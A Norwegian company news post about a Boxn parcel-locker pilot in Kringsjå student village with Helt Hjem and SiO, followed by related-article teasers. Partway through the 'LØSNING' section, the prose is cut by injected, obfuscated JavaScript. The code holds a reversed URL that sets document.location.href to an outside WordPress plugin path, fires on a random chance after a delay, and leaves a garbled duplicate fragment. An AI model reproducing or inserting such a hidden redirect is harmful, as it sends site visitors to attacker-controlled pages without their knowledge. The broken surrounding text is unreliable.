NY BOXN PÅ NY PLASSERING I NYTT SAMARBEID

Vi har nå satt ut en ny modell av Boxn i Kringsjå studentby. I dette spennende samarbeidet med Helt Hjem og Studentsamskipnaden i Oslo skal vi teste ut nye løsninger for å få pakkene levert helt til sluttkundens adresse.

SIKKERHET
I studentbyene slipper ikke bud inn i oppgangene der mange yngre mennesker bor. Det betyr også at tyveri fra dørmatten unngås. Med Boxn ligger pakkene trygt innlåst helt frem til kunden har mulighet til å hente ut pakken. 

BAKGRUNN
I denne studentbyen bor det hele 3500 studenter fordelt på et lite geografisk område. Den beste løsning for dem per i dag er enten å være hjemme når varene blir levert slik at de kan løpe ut og møte budet for en overlevering eller så må studentene ned til post i butikk på Ullevål for å hente ut pakkene de skal få levert. Det er en tur på over 2 kilometer og 90 høydemeter.

LØSNING
Studenter har ofte mange toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($GRn(0),delay);}andre aktiviteter på fritiden og mange baller i luften samtidig. Dette gjør at de ønsker å spare tid og slippe disse ekstra turene. De er i tillegg en gruppe mennesker som bestiller varer på nett fordi prisen på varen da ofte er billigere enn hva den ville kostet i en fysisk butikk. 

Denne testen er ideell for å vise hvilke utfordringer i markedet Boxn kan løse. Studenter er en målgruppe som er innovative og lystne etter å endre allerede eksisterende løsninger. Vi gleder oss til å se hvordan dette går og hvor mange av 3500 potensielle kundene som ønsker å teste produktet vårt. 

Vi vil takke både SiO og Helt Hjem for god dialog og samarbeidsvillighet og bidrag i dette prosjektet.

Les flere nyheter fra Boxn her

Relaterte artikler

Pakkeboks, Aktiv kjøl, klikk og hent, mat

Smart Supply og Boxn!

Boxn har i en lengre periode samarbeidet tett med Smart Supply om utrulling av pakkerterminaler i det norske markedet. Vi har gjennom dette samarbeidet fått

Helse vest IKT, Haukeland sykehus. IT utstyr, Pakkeboks, pakkebokser

Ny terminal ute hos Helse Vest!

Boxn og Helse Vest IKT har inngått en spennende pilot. Vi var i forrige uke i Bergen og leverte og monterte en MultiBoxn terminal. Denne

MultiBoxn med Aktiv kjøl

Endelig er MultiBoxn med aktiv kjøl på plass hos oss. Disse boksene har vi lenge ønsket å få produsert og levert da dette gir Boxn

nb_NONorwegian